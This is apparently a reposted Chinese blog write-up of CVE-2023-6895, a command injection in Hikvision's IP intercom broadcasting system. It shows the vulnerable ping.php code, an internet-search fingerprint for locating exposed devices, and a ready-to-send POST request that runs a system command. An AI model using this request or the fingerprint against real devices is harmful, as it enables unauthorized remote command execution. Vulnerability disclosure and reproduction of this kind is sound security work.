当前位置：首页 > news >正文

海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)

news 2026/5/13 9:26:26

漏洞介绍

海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞，该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
在这里插入图片描述

资产测绘

icon_hash=“-1830859634”
在这里插入图片描述

漏洞复现

查看漏洞关键代码：

header("Content-type: text/html; charset=GB2312");
$postData = $_POST['jsondata'];
if(isset($postData['ip']) && isset($postData['type'])){$type = $postData['type'];//类型$ip = $postData['ip'];//IP地址$arr = systemopr($type, $ip);$len = count($arr);for($i = 0; $i < $len; $i++){if(isset($arr[$i])){$arr[$i] = iconv('GB2312', 'UTF-8', $arr[$i]);//gb2312转换为utf-8}}$after = json_encode($arr);//转换成jsonecho $after;
}function systemopr($type, $ip, $times=4){$info = array();     if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){//linuxif($type == "0"){exec("ping -c $times $ip", $info);}else if($type == "1"){exec("traceroute -m $times -w 1 $ip", $info);}else{exec($ip, $info);}}else{//windowsif($type == "0"){exec("ping $ip -n $times", $info);}else if($type == "1"){exec("tracert -h $times -w 1000 $ip", $info);}else{exec($ip, $info);}}return $info;
}

可以发现当$postData['type']和$postData['ip']存在值时，则会传入systemopr函数，通过exec()函数进行拼接命令执行，当$postData['type']等于0或1时，则代入指定代码段，执行指定命令。但$postData['type']参数值不等于0和1时，可以不考虑参数闭合，直接可以通过$postData['ip']执行任意命令。而且恰巧$postData['type']和$postData['ip']的值都是POST传参可控的，导致我们可以执行任意系统命令。

POC如下：

POST /php/ping.php HTTP/1.1
Host: your_ip
Content-Length: 46
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: closejsondata%5Btype%5D=3&jsondata%5Bip%5D=ipconfig

在这里插入图片描述

修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://www.spon.com.cn/

海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)

漏洞介绍

资产测绘

漏洞复现

修复建议

相关文章：

海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)

IDE：DevEco Studio

【QT】C++/Qt使用Qt自带工具windeployqt打包

Ubuntu系统的基础操作和使用

harmonyOS 自定义组件基础演示讲解

我的创作纪念日——成为创作者第1024天

正点原子驱动开发BUG(一)--SPI无法正常通信

SpringBoot接入轻量级分布式日志框架GrayLog

光电器件：感知光与电的桥梁

Ceph入门到精通-smartctl 查看硬盘参数

Module build failed: TypeError: this.getOptions is not a function

蓝牙电子价签芯片OM6626/OM628超低功耗替代NRF52832

ELK（八）—Metricbeat部署

Ansible自动化运维以及模块使用

数据分析场景下，企业大模型选型的思路与建议

Mongodb复制集架构

云原生之深入解析Kubernetes集群发生网络异常时如何排查

error: C2039: “qt_metacast“: 不是 “***“ 的成员

量子计算：开启IT领域的新时代

数据可视化---柱状图

基于FreeRTOS与LVGL的智能手表开源系统InfiniTime开发指南

我让 AI 学会了“拆“App——Antigravity 逆向分析能力搭建手记

最火 AI 生图模型 Nano Banana Pro 国内免费使用指南

Python爬虫项目架构解析：从Requests到数据清洗的工程化实践

Windows右键菜单为何变得臃肿？ContextMenuManager帮你重新掌控

Serverless平台为何总让人“又爱又恨”？揭秘Lovable设计的3层情感化架构（开发者体验×运维韧性×业务敏捷）

Claude集成Spring Boot全链路实践：从零搭建智能API网关的7步标准化流程

医疗AI数据偏见：从耳镜图像分类看模型泛化陷阱与实战避坑指南

终极罗技PUBG鼠标宏配置：告别枪口上跳的智能解决方案

5分钟快速上手：qmcdump免费解密QQ音乐文件的终极指南